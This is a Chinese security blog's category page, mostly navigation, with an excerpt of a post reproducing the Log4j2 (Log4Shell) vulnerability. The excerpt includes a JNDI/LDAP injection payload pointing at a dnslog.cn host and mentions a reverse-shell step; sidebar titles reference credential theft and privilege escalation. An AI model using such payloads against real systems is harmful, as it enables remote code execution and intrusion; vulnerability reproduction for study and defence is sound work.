会员
商店
众包
新闻
博问
闪存
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
页首Html代码
与或非
博客园
首页
新随笔
联系
订阅
管理
随笔 - 21
文章 - 0
评论 - 0
阅读 -
4279
随笔分类 -
中间件安全
Log4j2漏洞复现
摘要:二、漏洞复现 2.1 使用DNLOG平台查看回显 可以使用相关的dnslog平台查看,也可以使用burp自带的dnslog进行查看,我这里使用的是 http://dnslog.cn/ ${jndi:ldap://rbmanr.dnslog.cn/exp} 有回显,说明存在该漏洞 2.2 反弹shel
阅读全文
posted @
2021-12-31 10:57
与或非丶
阅读(816)
评论(0)
推荐(0)
编辑
搜索
我的标签
编程
(10)
随笔分类
Java(9)
Linux安全(1)
Pyhon编程(1)
工具使用(1)
内网渗透(3)
前端安全(3)
中间件安全(1)
随笔档案
2022年4月(1)
2022年3月(10)
2022年2月(3)
2021年12月(3)
2021年9月(1)
2021年8月(3)
阅读排行榜
1. Log4j2漏洞复现(816)
2. 内网流量代理(653)
3. 信息收集(551)
4. Windows密码凭证窃取(425)
5. CVE-2022-0847本地提权复现(396)
点击右上角即可分享
